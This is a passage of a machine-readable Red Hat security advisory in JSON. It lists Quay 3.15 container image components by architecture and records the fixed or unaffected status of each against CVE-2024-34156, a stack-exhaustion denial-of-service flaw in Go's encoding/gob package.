"purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3Acde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1774979159"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3A88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1774979227"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel8@sha256%3A2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1775227789"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"product": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"product_id": "registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel8@sha256%3A76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1775249999"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel8@sha256%3Ae5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1774984603"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"product": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"product_id": "registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel8@sha256%3A8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b?arch=ppc64le\u0026repository_url=registry.redhat.io/quay\u0026tag=1775169219"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3Aee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1774979159"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3Ad6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1774979227"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-builder-rhel8@sha256%3A5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1775227789"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"product": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"product_id": "registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/clair-rhel8@sha256%3A0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1775249999"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-operator-rhel8@sha256%3A8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1774984603"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"product": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"product_id": "registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/quay-rhel8@sha256%3Abe166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a?arch=s390x\u0026repository_url=registry.redhat.io/quay\u0026tag=1775169219"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x"
},
"product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64 as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64"
},
"product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le"
},
"product_reference": "registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64 as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64 as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64 as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64 as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64 as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64 as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64 as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64 as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64 as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64",
"relates_to_product_reference": "Red Hat Quay 3.15"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-34156",
"cwe": {
"id": "CWE-674",
"name": "Uncontrolled Recursion"
},
"discovery_date": "2024-09-06T21:20:09.377905+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310528"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the encoding/gob package of the Golang standard library. Calling Decoder.Decoding, a message that contains deeply nested structures, can cause a panic due to stack exhaustion. This is a follow-up to CVE-2022-30635.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability in Go\u0027s `encoding/gob` package is of high severity because it exposes applications to potential Denial of Service (DoS) attacks through stack exhaustion. Since `gob` relies on recursive function calls to decode nested structures, an attacker could exploit this by sending crafted messages with excessively deep nesting, causing the application to panic due to stack overflow. This risk is particularly important in scenarios where untrusted or external input is processed, as it can lead to system unavailability or crashes, undermining the reliability and availability of services.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
